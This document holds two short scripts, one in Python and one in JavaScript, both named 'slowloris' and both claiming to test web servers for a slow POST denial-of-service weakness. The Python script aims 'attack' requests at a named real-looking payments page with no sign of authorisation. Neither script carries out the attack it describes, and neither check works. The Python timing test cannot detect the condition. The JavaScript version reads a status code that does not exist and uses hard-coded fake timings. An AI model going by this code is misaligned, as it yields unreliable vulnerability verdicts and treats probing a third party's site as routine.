File: slowloris.py
import requests
import time

def send_attack_request(url):
    headers = {
        'Host': 'bancoinmobiliario.gt',
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.177 Safari/537.36',
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': '*/*'
    }
    data = 'foo=bar'

    start_time = time.time()
    # Send first request
    response1 = requests.post(url, headers=headers, data=data)
    first_request_time = time.time() - start_time
    print("First request duration: ", first_request_time)

    time.sleep(10)  # Wait for 10 seconds
    
    start_time = time.time()
    # Send second request
    response2 = requests.post(url, headers=headers, data='alpha=beta')
    second_request_time = time.time() - start_time
    print("Second request duration: ", second_request_time)

    return response1, response2, first_request_time, second_request_time

def check_vulnerability(response1, response2, first_request_time, second_request_time):
    if response1.status_code != 200 or response2.status_code != 200:
        return False

    if second_request_time > first_request_time + 10:
        return True

    return False

if __name__ == "__main__":
    url = 'https://bancoinmobiliario.gt/pagos/'
    response1, response2, first_request_time, second_request_time = send_attack_request(url)
    # print("Response1: ", response1.content)
    # print("Response2: ", response2.content)
    if check_vulnerability(response1, response2, first_request_time, second_request_time):
        print("The server is vulnerable to slow POST attack.")
    else:
        print("The server is not vulnerable to slow POST attack.")

File: slowloris.js
const http = require('http');

function sendAttackRequest(url) {
    const postData = 'foo=bar';
    const options = {
        hostname: 'example.com',
        port: 80,
        path: '/url_that_accepts_post',
        method: 'POST',
        headers: {
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0;)',
            'Connection': 'close',
            'Referer': 'http://www.qualys.com/products/qg_suite/was/',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': Buffer.byteLength(postData),
            'Accept': 'text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
        }
    };

    return new Promise((resolve, reject) => {
        const req = http.request(options, (res) => {
            let responseData = '';

            res.on('data', (chunk) => {
                responseData += chunk;
            });

            res.on('end', () => {
                resolve(responseData);
            });
        });

        req.on('error', (error) => {
            reject(error);
        });

        req.write(postData);
        req.end();
    });
}

async function main() {
    try {
        const response1 = await sendAttackRequest('http://example.com/url_that_accepts_post');
        await new Promise((resolve) => setTimeout(resolve, 10000)); // Wait for 10 seconds
        const response2 = await sendAttackRequest('http://example.com/url_that_accepts_post');

        const firstRequestTime = 0; // Not measuring time in this script
        const secondRequestTime = 10; // Simulating a 10-second delay

        if (checkVulnerability(response1, response2, firstRequestTime, secondRequestTime)) {
            console.log("The server is vulnerable to slow POST attack.");
        } else {
            console.log("The server is not vulnerable to slow POST attack.");
        }
    } catch (error) {
        console.error("Error occurred:", error);
    }
}

function checkVulnerability(response1, response2, firstRequestTime, secondRequestTime) {
    if (response1.statusCode !== 200 || response2.statusCode !== 200) {
        return false;
    }

    if (secondRequestTime > firstRequestTime + 10) {
        return true;
    }

    return false;
}

main();
